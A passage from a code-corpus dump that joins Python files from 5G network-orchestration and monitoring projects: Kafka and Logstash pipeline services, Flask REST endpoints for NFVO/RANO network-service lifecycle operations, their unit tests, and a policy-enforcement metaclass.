# Dashboard creation is commented because it will be created when data is published in the topic.
#r = requests.post(dcs_dashboard_url, json={'records': [ { 'value': json.loads(msg.value) }]})
#logger.info("Response: Code %s", r)
# Create Kafka consumer to wait for the first message received in the topic and, then, refresh the dashboard.
thread = threading.Thread(target = kafka_consumer_refresh_dashboard_handler, args = [topic, msg.value])
thread.start()
# Finally, save topic in DB
try:
connection = psycopg2.connect(user = "eve", password = <PASSWORD>, host = "localhost", port = "5432", dbname="pipelines")
logger.info("Inserting %s topic in database", topic)
cursor = connection.cursor()
cursor.execute("INSERT INTO pipeline VALUES ( %s )", (topic,))
connection.commit()
logger.info("Topic %s inserted in database", topic)
cursor.close()
connection.close()
except (Exception, psycopg2.Error) as error:
logger.error("Error while connecting to PostgreSQL: ", error)
elif json.loads(msg.value)["action"] == "unsubscribe":
logger.info("Delete Logstash pipeline for topic %s", topic)
subprocess.call(['/bin/bash', '/usr/bin/dcs/delete_logstash_pipeline.sh', topic, 'no'])
# Schedule the removal of Kibana dashboard and Elasticsearch index (retention time of 14 days)
scheduled_thread = threading.Timer(timedelta(days=14).total_seconds(), index_cleaner, args = [topic, msg.value])
# This call is for testing purposes, to be commented when unused:
#scheduled_thread = threading.Timer(timedelta(seconds=30).total_seconds(), index_cleaner, args = [topic, msg.value])
scheduled_thread.start()
logger.info("Data removal for topic %s scheduled in 14 days", topic)
# Finally, delete topic in DB
try:
connection = psycopg2.connect(user = "eve", password = <PASSWORD>, host = "localhost", port = "5432", dbname="pipelines")
logger.info("Deleting %s topic in database", topic)
cursor = connection.cursor()
cursor.execute("DELETE FROM pipeline WHERE topic = %s", (topic,))
connection.commit()
logger.info("Topic %s deleted in database", topic)
cursor.close()
connection.close()
except (Exception, psycopg2.Error) as error:
logger.error("Error while connecting to PostgreSQL: ", error)
else:
logger.error("Action not allowed")
logger.info("Closing Kafka Consumer for %s topic", signalling_topic_data["topic"])
consumer.close()
def start_consuming_signalling_topic(signalling_topic_data):
signalling_topic_data = json.loads(signalling_topic_data)
logger.info("Starting %s topic", signalling_topic_data["topic"])
logger.info("Sending POST request to %s", url_subscribe)
# Send the request to the DCM.
r = requests.post(url_subscribe, json=signalling_topic_data)
logger.info("Response: Code %s", r)
# Create Kafka consumer.
global signalling_start
signalling_start = True
thread = threading.Thread(target = kafka_consumer_signalling_topic_handler, args = [signalling_topic_data])
thread.start()
@app.route('/portal/dcs/start_signalling/', methods=['POST'])
def start_dcs():
"""
Start signalling topics.
---
describe: start signalling topics
responses:
201:
description: accepted request
400:
description: error processing the request
"""
logger.info("Request received - POST /portal/dcs/start_signalling/")
try:
start_consuming_signalling_topic(json.dumps(signalling_metric_infrastructure))
start_consuming_signalling_topic(json.dumps(signalling_metric_application))
start_consuming_signalling_topic(json.dumps(signalling_kpi))
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
def stop_consuming_signalling_topic(signalling_topic_data):
signalling_topic_data = json.loads(signalling_topic_data)
logger.info("Stopping %s topic", signalling_topic_data["topic"])
logger.info("Sending DELETE request to %s", url_unsubscribe)
# Send the request to the DCM.
r = requests.delete(url_unsubscribe, json=signalling_topic_data)
logger.info("Response: Code %s", r)
# Delete Kafka consumer.
global signalling_start
# Put signalling_start to False, and then threads will finish their execution.
signalling_start = False
@app.route('/portal/dcs/stop_signalling/', methods=['DELETE'])
def stop_dcs():
"""
Stop signalling topics.
---
describe: stop signalling topics
responses:
201:
description: accepted request
400:
description: error processing the request
"""
logger.info("Request received - DELETE /portal/dcs/stop_signalling/")
try:
stop_consuming_signalling_topic(json.dumps(signalling_metric_infrastructure))
stop_consuming_signalling_topic(json.dumps(signalling_metric_application))
stop_consuming_signalling_topic(json.dumps(signalling_kpi))
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
def checkValidPort(value):
ivalue = int(value)
# RFC 793
if ivalue < 0 or ivalue > 65535:
raise argparse.ArgumentTypeError("%s is not a valid port" % value)
return value
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--dcm_ip_address",
help='DCM IP address, default IP is localhost',
default='localhost')
parser.add_argument(
"--eve_db_password",
help='DB password for eve user')
parser.add_argument(
"--port",
type=checkValidPort,
help='The port you want to use as an endpoint, default port is 8091',
default="8091")
parser.add_argument(
"--log",
help='Sets the Log Level output, default level is "info"',
choices=[
"info",
"debug",
"error",
"warning"],
nargs='?',
default='info')
args = parser.parse_args()
numeric_level = getattr(logging, str(args.log).upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % loglevel)
coloredlogs.install(
fmt='%(asctime)s %(levelname)s %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
level=numeric_level)
logging.basicConfig(filename='/var/log/dcs_rest_client.log')
logging.getLogger("DCSRestClient").setLevel(numeric_level)
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR)
args = parser.parse_args()
logger.info("Serving DCSRestClient on port %s", str(args.port))
global dcm_ip_address
dcm_ip_address= str(args.dcm_ip_address)
global url_subscribe
url_subscribe = "http://" + dcm_ip_address + ":" + dcm_port + dcm_subscribe_url
global url_unsubscribe
url_unsubscribe = "http://" + dcm_ip_address + ":" + dcm_port + dcm_unsubscribe_url
global eve_db_password
eve_db_password= str(args.eve_db_password)
#TODO: advanced feature - connect to the database and make sure that Logstash pipelines are created for the topics saved in the DB.
serve(app, host='0.0.0.0', port=args.port)
``` |
{
"source": "5GEVE/monitoring_dockerized_environment",
"score": 2
} |
#### File: create_kafka_topic/files/create_kafka_topic.py
```python
import requests
import argparse
import logging
import coloredlogs
from flask import Flask, request, jsonify
from flask_swagger import swagger
from waitress import serve
from kafka.admin import KafkaAdminClient, NewTopic
import json
app = Flask(__name__)
logger = logging.getLogger("CreateKafkaTopic")
@app.route('/', methods=['GET'])
def server_status():
logger.info("GET /")
return '', 200
@app.route("/spec", methods=['GET'])
def spec():
swag = swagger(app)
swag['info']['version'] = "1.0"
swag['info']['title'] = "CreateKafkaTopic REST API"
return jsonify(swag)
@app.route('/create_kafka_topic', methods=['POST'])
def create_kafka_topic():
logger.info("Request received - POST /create_kafka_topic")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
admin_client = KafkaAdminClient(
bootstrap_servers=kafka_ip_port,
client_id='create_kafka_topic')
# Parse JSON
data = request.get_json()
logger.info("Data received: %s", data)
topic = data["topic"]
logger.info("Creating topic %s in Kafka", topic)
topic_list = []
topic_list.append(NewTopic(name=topic, num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
admin_client.close()
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
if __name__ == "__main__":
# Usage: /usr/bin/python3 create_kafka_topic.py --kafka_ip_port localhost:9092 --log info
parser = argparse.ArgumentParser()
parser.add_argument(
"--kafka_ip_port",
help='Kafka IP:port',
default='localhost:9092')
parser.add_argument(
"--log",
help='Sets the Log Level output, default level is "info"',
choices=[
"info",
"debug",
"error",
"warning"],
nargs='?',
default='info')
args = parser.parse_args()
numeric_level = getattr(logging, str(args.log).upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % loglevel)
coloredlogs.install(
fmt='%(asctime)s %(levelname)s %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
level=numeric_level)
logging.getLogger("CreateKafkaTopic").setLevel(numeric_level)
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR)
global kafka_ip_port
kafka_ip_port= str(args.kafka_ip_port)
logger.info("Serving CreateKafkaTopic on port 8190")
serve(app, host='0.0.0.0', port=8190)
```
#### File: v1/files/logstash_pipeline_manager.py
```python
import requests
import argparse
import logging
import coloredlogs
from flask import Flask, request, jsonify
from flask_swagger import swagger
from waitress import serve
import subprocess
import json
app = Flask(__name__)
logger = logging.getLogger("LogstashPipelineManager")
@app.route('/', methods=['GET'])
def server_status():
logger.info("GET /")
return '', 200
@app.route("/spec", methods=['GET'])
def spec():
swag = swagger(app)
swag['info']['version'] = "1.0"
swag['info']['title'] = "LogstashPipelineManager REST API"
return jsonify(swag)
@app.route('/logstash_pipeline_manager', methods=['POST'])
def create_logstash_pipeline():
logger.info("Request received - POST /logstash_pipeline_manager")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
# Parse JSON
data = request.get_json()
logger.info("Data received: %s", data)
topic = data["topic"]
logger.info("Create Logstash pipeline for topic %s", topic)
subprocess.call(['/bin/bash', script_path + '/create_logstash_pipeline.sh', topic, elasticsearch_ip_port, kafka_ip_port, elk_password])
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
@app.route('/logstash_pipeline_manager', methods=['DELETE'])
def delete_logstash_pipeline():
logger.info("Request received - DELETE /logstash_pipeline_manager")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
# Parse JSON
data = request.get_json()
logger.info("Data received: %s", data)
topic = data["topic"]
logger.info("Delete Logstash pipeline for topic %s", topic)
subprocess.call(['/bin/bash', script_path + '/delete_logstash_pipeline.sh', topic])
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
if __name__ == "__main__":
# Usage: /usr/bin/python3 logstash_pipeline_manager.py --script_path /tmp --kafka_ip_port localhost:9092 --elasticsearch_ip_port localhost:9200 --elk_password <PASSWORD> --log info
parser = argparse.ArgumentParser()
parser.add_argument(
"--script_path",
help='Script path')
parser.add_argument(
"--kafka_ip_port",
help='Kafka IP:port',
default='localhost:9092')
parser.add_argument(
"--elasticsearch_ip_port",
help='Elasticsearch IP:port',
default='localhost:9200')
parser.add_argument(
"--elk_password",
help='ELK password')
parser.add_argument(
"--log",
help='Sets the Log Level output, default level is "info"',
choices=[
"info",
"debug",
"error",
"warning"],
nargs='?',
default='info')
args = parser.parse_args()
numeric_level = getattr(logging, str(args.log).upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % loglevel)
coloredlogs.install(
fmt='%(asctime)s %(levelname)s %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
level=numeric_level)
logging.getLogger("LogstashPipelineManager").setLevel(numeric_level)
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR)
global script_path
script_path= str(args.script_path)
global kafka_ip_port
kafka_ip_port= str(args.kafka_ip_port)
global elasticsearch_ip_port
elasticsearch_ip_port = str(args.elasticsearch_ip_port)
global url_elasticsearch
url_elasticsearch = "http://" + elasticsearch_ip_port
global elk_password
elk_password= str(args.elk_password)
logger.info("Serving LogstashPipelineManager on port 8191")
serve(app, host='0.0.0.0', port=8191)
```
#### File: serverless_functions/delete-kafka/handler.py
```python
import json
from kafka.admin import KafkaAdminClient
def handle(event, context):
if event.method == "POST":
try:
data = json.loads(event.body)
topic = data["topic"]
admin_client = KafkaAdminClient(
bootstrap_servers="kafka.deployment8:9092",
client_id="delete_kafka_topic",
)
admin_client.delete_topics(topics=[topic])
admin_client.close()
return {"statusCode": 201, "body": "No Content"}
except Exception as e:
return {"statusCode": 400, "body": f"Error parsing request: {e}"}
else:
return {"statusCode": 200, "body": "No action for this endpoint"}
``` |
{
"source": "5GEVE/mso-lo",
"score": 2
} |
#### File: mso-lo/adaptation_layer/app.py
```python
from flask import (
Blueprint, request, jsonify,
abort, make_response
)
import adaptation_layer.driver.manager as manager
from adaptation_layer import database
from adaptation_layer import tasks
from adaptation_layer.error_handler import Unauthorized, BadRequest, \
ServerError, NfvoNotFound, NsNotFound, NsdNotFound, \
NsOpNotFound, NfvoCredentialsNotFound, SubscriptionNotFound, Forbidden, \
Conflict, Unprocessable
nfvo_bp = Blueprint('nfvo', __name__, url_prefix='/nfvo')
rano_bp = Blueprint('rano', __name__, url_prefix='/rano')
@nfvo_bp.route('/', methods=['GET'])
@rano_bp.route('/', methods=['GET'])
def get_orchestrator_list():
try:
if request.blueprint == 'nfvo':
return make_response(jsonify(database.msolo_db.get_nfvo_list()), 200)
elif request.blueprint == 'rano':
return make_response(jsonify(database.msolo_db.get_rano_list()), 200)
except Unauthorized as e:
abort(401, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>', methods=['GET'])
@rano_bp.route('/<orc_id>', methods=['GET'])
def get_nfvo(orc_id):
try:
if request.blueprint == 'nfvo':
return make_response(jsonify(database.msolo_db.get_nfvo_by_id(orc_id)), 200)
elif request.blueprint == 'rano':
return make_response(jsonify(database.msolo_db.get_rano_by_id(orc_id)), 200)
except Unauthorized as e:
abort(401, description=e.description)
except NfvoNotFound as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances', methods=['POST'])
@rano_bp.route('/<orc_id>/ns_instances', methods=['POST'])
def create_ns(orc_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
ns, headers = driver.create_ns(
args={'payload': request.json, 'args': request.args.to_dict()})
return make_response(jsonify(ns), 201, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsdNotFound) as e:
abort(404, description=e.description)
except Conflict as e:
abort(409, description=e.description)
except Unprocessable as e:
abort(422, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances', methods=['GET'])
@rano_bp.route('/<orc_id>/ns_instances', methods=['GET'])
def get_ns_list(orc_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
ns_list, headers = driver.get_ns_list(args={'args': request.args.to_dict()})
return make_response(jsonify(ns_list), 200, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances/<ns_id>', methods=['GET'])
@rano_bp.route('/<orc_id>/ns_instances/<ns_id>', methods=['GET'])
def get_ns(orc_id, ns_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
ns, headers = driver.get_ns(ns_id, args={'args': request.args.to_dict()})
return make_response(jsonify(ns), 200, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances/<ns_id>', methods=['DELETE'])
@rano_bp.route('/<orc_id>/ns_instances/<ns_id>', methods=['DELETE'])
def delete_ns(orc_id, ns_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
empty_body, headers = driver.delete_ns(
ns_id, args={'args': request.args.to_dict()})
return make_response('', 204, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances/<ns_id>/instantiate', methods=['POST'])
@rano_bp.route('/<orc_id>/ns_instances/<ns_id>/instantiate', methods=['POST'])
def instantiate_ns(orc_id, ns_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
empty_body, headers = driver.instantiate_ns(
ns_id,
args={'payload': request.json, 'args': request.args.to_dict()})
return make_response('', 202, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except Conflict as e:
abort(409, description=e.description)
except Unprocessable as e:
abort(422, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances/<ns_id>/terminate', methods=['POST'])
@rano_bp.route('/<orc_id>/ns_instances/<ns_id>/terminate', methods=['POST'])
def terminate_ns(orc_id, ns_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
empty_body, headers = driver.terminate_ns(
ns_id,
args={'args': request.args.to_dict()})
return make_response('', 202, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except Conflict as e:
abort(409, description=e.description)
except Unprocessable as e:
abort(422, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances/<ns_id>/scale', methods=['POST'])
@rano_bp.route('/<orc_id>/ns_instances/<ns_id>/scale', methods=['POST'])
def scale_ns(orc_id, ns_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
empty_body, headers = driver.scale_ns(
ns_id,
args={'payload': request.json, 'args': request.args.to_dict()})
return make_response('', 202, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except Conflict as e:
abort(409, description=e.description)
except Unprocessable as e:
abort(422, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_lcm_op_occs', methods=['GET'])
@rano_bp.route('/<orc_id>/ns_lcm_op_occs', methods=['GET'])
def get_op_list(orc_id):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
op_list, headers = driver.get_op_list(args={'args': request.args.to_dict()})
return make_response(jsonify(op_list), 200, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, NsNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_lcm_op_occs/<nsLcmOpId>', methods=['GET'])
@rano_bp.route('/<orc_id>/ns_lcm_op_occs/<nsLcmOpId>', methods=['GET'])
def get_op(orc_id, nsLcmOpId):
try:
driver = manager.get_driver(request.blueprint, orc_id, database.msolo_db)
ns_op, headers = driver.get_op(nsLcmOpId, args={'args': request.args.to_dict()})
return make_response(jsonify(ns_op), 200, headers)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound,
NsNotFound, NsOpNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/subscriptions', methods=['GET'])
def get_subscription_list(orc_id):
try:
return make_response(jsonify(database.msolo_db.get_subscription_list(orc_id)), 200)
except Unauthorized as e:
abort(401, description=e.description)
except NfvoNotFound as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/subscriptions', methods=['POST'])
def create_subscription(orc_id):
try:
return make_response(jsonify(database.msolo_db.create_subscription(orc_id, request.json)), 201)
except BadRequest as e:
abort(400, description=e.description)
except Unauthorized as e:
abort(401, description=e.description)
except Forbidden as e:
abort(403, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound) as e:
abort(404, description=e.description)
except Conflict as e:
abort(409, description=e.description)
except Unprocessable as e:
abort(422, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/subscriptions/<subscriptionId>', methods=['GET'])
def get_subscription(orc_id, subscriptionId):
try:
return make_response(jsonify(database.msolo_db.get_subscription(orc_id, subscriptionId)), 200)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, SubscriptionNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/subscriptions/<subscriptionId>', methods=['DELETE'])
def delete_subscription(orc_id, subscriptionId):
try:
database.msolo_db.delete_subscription(subscriptionId)
return make_response('', 204)
except Unauthorized as e:
abort(401, description=e.description)
except (NfvoNotFound, NfvoCredentialsNotFound, SubscriptionNotFound) as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/notifications', methods=['POST'])
def post_notification(orc_id):
required = ('nsInstanceId', 'operation', 'operationState')
if not all(k in request.json for k in required):
abort(400, 'One of {0} is missing'.format(str(required)))
tasks.forward_notification.delay(request.json)
return make_response('', 204)
```
#### File: mso-lo/adaptation_layer/db.py
```python
import os
from flask_migrate import Migrate
from adaptation_layer.repository import sqlite, iwf_repository
from flask import current_app, _app_ctx_stack
class MsoloDB(object):
def __init__(self, app=None):
if app is not None:
self.init_app(app)
def init_app(self, app):
self.app = app
app.teardown_appcontext(self.teardown)
IWFREPO = os.getenv('IWFREPO', 'false').lower()
if IWFREPO == 'true':
self.app.logger.info('using iwf repository')
self.msolo_db = iwf_repository
else:
self.app.logger.info('using sqlite')
sqlite.db.init_app(self.app)
basedir = os.path.abspath(os.path.dirname(__file__))
MIGRATION_DIR = os.path.join(basedir, 'migrations')
migrate = Migrate(self.app, sqlite.db, directory=MIGRATION_DIR)
self.msolo_db = sqlite
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'msolo_db'):
del ctx.msolo_db
```
#### File: adaptation_layer/tests/test_fivegr_so.py
```python
import unittest
from urllib.parse import urlparse
from jsonschema import validate
from jsonschema.exceptions import ValidationError, SchemaError
from adaptation_layer import create_app
from .request_mock import mock_ns, mock_ns_scale_v2, mock_ns_terminate, mock_ns_instantiatev2, mock_ns_instantiate
from .response_schemas import ns_lcm_op_occ_schema, ns_list_schema, ns_schema, \
ns_lcm_op_occ_list_schema
class fivegrSOTestCase(unittest.TestCase):
client = None
@classmethod
def setUpClass(cls):
"""Define test variables and initialize app."""
cls.client = create_app().test_client
# Check status codes 201, 401, 404, headers and payload for create_ns()
def test_create_ns_201(self):
res = self.client().post('/nfvo/4/ns_instances?__code=201', json=mock_ns)
self.assertEqual(201, res.status_code)
self.assertIn('Location', res.headers)
validate_url = urlparse(res.headers["Location"])
self.assertTrue(all([validate_url.scheme, validate_url.netloc, validate_url.path]))
try:
validate(res.json, ns_schema)
except (ValidationError, SchemaError) as e:
self.fail(msg=e.message)
def test_create_ns_400(self):
res = self.client().post('/nfvo/4/ns_instances?__code=400')
self.assertEqual(400, res.status_code)
# Check status codes 200, 401, 404, headers and payload for get_ns()
def test_get_ns_200(self):
res = self.client().get('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7?__code=200')
self.assertEqual(200, res.status_code)
try:
validate(res.json, ns_schema)
except (ValidationError, SchemaError) as e:
self.fail(msg=e.message)
# FIXME: Improve 5gr-so OPENAPI specification to make non functional requirements work
# def test_get_ns_404(self):
# res = self.client().get('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b8?__code=404')
# self.assertEqual(404, res.status_code)
# Check status codes 202, 401, 404, headers and payload for instantiate_ns()
def test_instantiate_ns_202(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/instantiate?__code=200', json=mock_ns_instantiatev2)
self.assertEqual(202, res.status_code)
self.assertIn('Location', res.headers)
validate_url = urlparse(res.headers["Location"])
self.assertTrue(all([validate_url.scheme, validate_url.netloc, validate_url.path]))
def test_instantiate_ns_400(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/instantiate?__code=400', json=mock_ns_instantiate)
self.assertEqual(400, res.status_code)
def test_instantiate_ns_404(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b9/instantiate?__code=404', json=mock_ns_instantiatev2)
self.assertEqual(404, res.status_code)
# Check status codes 202, 401, 404, headers and payload for scale_ns()
def test_scale_ns_202(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/scale?__code=200',
json=mock_ns_scale_v2)
self.assertEqual(202, res.status_code)
self.assertIn('Location', res.headers)
validate_url = urlparse(res.headers["Location"])
self.assertTrue(all([validate_url.scheme, validate_url.netloc, validate_url.path]))
def test_scale_ns_404(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/scale?__code=404',
json=mock_ns_scale_v2)
self.assertEqual(404, res.status_code)
# Check status codes 202, 401, 404, headers and payload for terminate_ns()
def test_terminate_ns_202(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/terminate?__code=200',
json=mock_ns_terminate)
self.assertEqual(202, res.status_code)
self.assertIn('Location', res.headers)
validate_url = urlparse(res.headers["Location"])
self.assertTrue(all([validate_url.scheme, validate_url.netloc, validate_url.path]))
def test_terminate_ns_404(self):
res = self.client().post('/nfvo/4/ns_instances/49ccb6a2-5bcd-4f35-a2cf-7728c54e48b7/terminate?__code=404',
json=mock_ns_terminate)
self.assertEqual(404, res.status_code)
# Check status codes 200, 401, 404, headers and payload for get_ns_lcm_op_occs_()
def test_get_ns_lcm_op_occs_200(self):
res = self.client().get('/nfvo/4/ns_lcm_op_occs/49ccb6a2-5bcd-4f35-a2cf-7728c54c48b7?__code=200')
self.assertEqual(200, res.status_code)
try:
validate(res.json, ns_lcm_op_occ_schema)
except (ValidationError, SchemaError) as e:
self.fail(msg=e.message)
self.assertEqual(200, res.status_code)
def test_get_ns_lcm_op_occs_404(self):
res = self.client().get('/nfvo/4/ns_lcm_op_occs/49ccb6a2-5bcd-4f35-a2cf-7728c54c48b7?__code=404')
self.assertEqual(404, res.status_code)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "5GExchange/escape",
"score": 2
} |
#### File: escape/adapt/policy_enforcement.py
```python
import repr
from functools import wraps
from escape.adapt import log as log
class PolicyEnforcementError(RuntimeError):
"""
Exception class to signal policy enforcement error.
"""
pass
class PolicyEnforcementMetaClass(type):
"""
Meta class for handling policy enforcement in the context of classes inherited
from :class:`AbstractVirtualizer
<escape.orchest.virtualization_mgmt.AbstractVirtualizer>`.
If the :class:`PolicyEnforcement` class contains a function which name
matches one in the actual Virtualizer then PolicyEnforcement's function will
be called first.
.. warning::
Therefore the function names must be identical!
.. note::
If policy checking fails a :class:`PolicyEnforcementError` should be
raised and handled in a higher layer..
To use policy checking set the following class attribute:
>>> __metaclass__ = PolicyEnforcementMetaClass
"""
def __new__ (mcs, name, bases, attrs):
"""
Magic function called before subordinated class even created
:param name: given class name
:type name: str
:param bases: bases of the class
:type bases: tuple
:param attrs: given attributes
:type attrs: dict
:return: inferred class instance
:rtype: AbstractVirtualizer
"""
# Check Virtualizer methods
for attr_name, attr_value in attrs.iteritems():
# if non-private and callable
if not attr_name.startswith('_') and callable(attr_value):
# Get policy checking functions from PolicyEnforcement
hooks = (getattr(PolicyEnforcement, "pre_" + attr_name, None),
getattr(PolicyEnforcement, "post_" + attr_name, None))
# if pre and/or post hook is defined set a wrapper
if any(hooks):
attrs[attr_name] = mcs.get_wrapper(attr_value, hooks)
return super(PolicyEnforcementMetaClass, mcs).__new__(mcs, name, bases,
attrs)
@classmethod
def get_wrapper (mcs, orig_func, hooks):
"""
Return a decorator function which do the policy enforcement check.
:param orig_func: original function
:type orig_func: func
:param hooks: tuple of pre and post checking functions
:type hooks: tuple
:raise: PolicyEnforcementError
:return: decorator function
:rtype: func
"""
@wraps(orig_func)
def wrapper (*args, **kwargs):
"""
Wrapper function which call policy checking functions if they exist.
"""
if len(args) > 0:
# Call Policy checking function before original
if hooks[0]:
log.debug("Invoke Policy checking function: [PRE] %s" % (
hooks[0].__name__.split('pre_', 1)[1]))
hooks[0](args, kwargs)
# Call original function
ret_value = orig_func(*args, **kwargs)
# Call Policy checking function after original
if hooks[1]:
log.debug("Invoke Policy checking function: [POST] %s" % (
hooks[1].__name__.split('post_', 1)[1]))
hooks[1](args, kwargs, ret_value)
return ret_value
else:
log.warning("Something went wrong during binding Policy checker!")
log.error("Abort policy enforcement checking!")
raise PolicyEnforcementError("Policy enforcement checking is aborted")
return wrapper
class PolicyEnforcement(object):
"""
Proxy class for policy checking.
Contains the policy checking function.
Binding is based on function name (checking function have to exist in this
class and its name have to stand for the `pre_` or `post_` prefix and the
name of the checked function).
.. warning::
Every PRE policy checking function is classmethod and need to have two
parameter for nameless (args) and named(kwargs) params:
Example:
>>> def pre_sanity_check (cls, args, kwargs):
.. warning::
Every POST policy checking function is classmethod and need to have three
parameter for nameless (args), named (kwargs) params and return value:
Example:
>>> def post_sanity_check (cls, args, kwargs, ret_value):
.. note::
The first element of args is the supervised Virtualizer ('self' param in the
original function)
"""
def __init__ (self):
"""
Init
"""
super(PolicyEnforcement, self).__init__()
@classmethod
def pre_sanity_check (cls, args, kwargs):
"""
Implements the the sanity check before virtualizer's sanity check is called.
:param args: original nameless arguments
:type args: tuple
:param kwargs: original named arguments
:type kwargs: dict
:return: None
"""
virtualizer = args[0]
nffg = args[1]
# TODO - implement
log.debug("PolicyEnforcement: sanity_check NFFG(%s) <--> %s [OK]" % (
nffg, repr.repr(virtualizer)))
@classmethod
def post_sanity_check (cls, args, kwargs, ret_value):
"""
Implements the the sanity check after virtualizer's sanity check is called.
:param args: original nameless arguments
:type args: tuple
:param kwargs: original named arguments
:type kwargs: dict
:param ret_value: return value of Virtualizer's policy check function
:return: None
"""
virtualizer = args[0]
nffg = args[1]
# TODO - implement
log.debug("PolicyEnforcement: sanity_check NFFG(%s) <--> %s [OK]" % (
